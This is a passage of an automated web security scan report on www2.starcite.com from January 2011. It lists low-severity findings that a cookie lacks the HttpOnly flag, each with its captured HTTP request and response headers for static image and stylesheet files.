The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_btm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d10-ea-455110eec1300"
Accept-Ranges: bytes
Content-Length: 234
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/


2.146. http://www2.starcite.com/starcite/themes/garland/images/section_btm_blue.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_btm_blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_btm_blue.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d11-69d-455110eec1300"
Accept-Ranges: bytes
Content-Length: 1693
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/


2.147. http://www2.starcite.com/starcite/themes/garland/images/section_top.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_top.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002d14-1bbf-454d486e81800"
Accept-Ranges: bytes
Content-Length: 7103
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/


2.148. http://www2.starcite.com/starcite/themes/garland/images/section_top_blue.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_top_blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_top_blue.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d15-fc2-455110eec1300"
Accept-Ranges: bytes
Content-Length: 4034
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/


2.149. http://www2.starcite.com/starcite/themes/garland/images/separator_top.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/separator_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/separator_top.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Wed, 03 Sep 2008 00:38:00 GMT
ETag: "1000000002d18-331-455f30c61ea00"
Accept-Ranges: bytes
Content-Length: 817
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/


2.150. http://www2.starcite.com/starcite/themes/garland/images/site_topbg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/site_topbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/site_topbg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002d19-2e-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 46
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/


2.151. http://www2.starcite.com/starcite/themes/garland/images/spacer.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/spacer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002d1a-2b-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/


2.152. http://www2.starcite.com/starcite/themes/garland/images/tableftF.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/tableftF.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/tableftF.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d1e-15b-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 347
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:48 GMT;path=/


2.153. http://www2.starcite.com/starcite/themes/garland/images/tabrightF.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/tabrightF.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/tabrightF.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d1f-42b-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 1067
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/


2.154. http://www2.starcite.com/starcite/themes/garland/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/print.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Wed, 18 Apr 2007 16:09:00 GMT
ETag: "1000000002c33-4e8-42e654de0df00"
Accept-Ranges: bytes
Content-Length: 1256
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/* $Id: print.css,v 1.1.2.1 2007/04/18 03:38:59 drumm Exp $ */

/**
* Themetastic, for Drupal 5.0
* Stefan Nagtegaal, iStyledThis [dot] nl
* Steven Wittens, acko [dot] net`
*
* If you use a custo
...[SNIP]...

2.155. http://www2.starcite.com/starcite/themes/garland/promo-rotation2.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/promo-rotation2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/promo-rotation2.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Sun, 25 Apr 2010 20:32:45 GMT
ETag: "10000000031a0-a03-485159015d540"
Accept-Ranges: bytes
Content-Length: 2563
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/*body { background-color: #ffffff; margin:0px; padding:0px;}*//*img { border:0px;}*//*div { margin:0px; padding:0px; font-family:verdana; font-size:12px;}*/#big-pic
...[SNIP]...

2.156. http://www2.starcite.com/starcite/themes/garland/starcite.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/starcite.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/starcite.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Tue, 31 Mar 2009 16:28:27 GMT
ETag: "1000000002c36-41ed-4666cb04b830a"
Accept-Ranges: bytes
Content-Length: 16877
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

@charset "utf-8";
/* CSS Document */
/*Depricated CSS Starts*/

*
{
   font-family:Arial, Helvetica, sans-serif;
   font-size:12px;
}
.wrapper
{
   text-align:left;
   margin:0 auto;
   width:970px
...[SNIP]...

2.157. http://www2.starcite.com/starcite/themes/garland/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/style.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Fri, 24 Oct 2008 18:59:00 GMT
ETag: "1000000002c37-4479-45a045fc5a500"
Accept-Ranges: bytes
Content-Length: 17529
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* Stylesheet classes for starcite based on STA_styleguide_v1.pdf */
*
{
   font-family:Arial, Helvetica, sans-serif;
   font-size:12px;
}
body{
   margin:0px;
   padding:0px;
   text-align:center;
}
...[SNIP]...

2.158. http://www2.starcite.com/starcite/themes/garland/views-list-Newsview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-Newsview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-Newsview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 12:06:02 GMT
ETag: "1000000002c4f-457-45af0010831bc"
Accept-Ranges: bytes
Content-Length: 1111
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Tue, 07/29/2008 - 12:50
* View: Newsview
*
* The class sel
...[SNIP]...

2.159. http://www2.starcite.com/starcite/themes/garland/views-list-customersuccessview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-customersuccessview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-customersuccessview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 17:31:00 GMT
ETag: "1000000002c3d-7fe-4546ede539d00"
Accept-Ranges: bytes
Content-Length: 2046
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Wed, 07/30/2008 - 04:31
* View: customersuccessview
*
* Th
...[SNIP]...

2.160. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerseventview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-plannerseventview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.161. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerswhitepaperview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-plannerswhitepaperview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

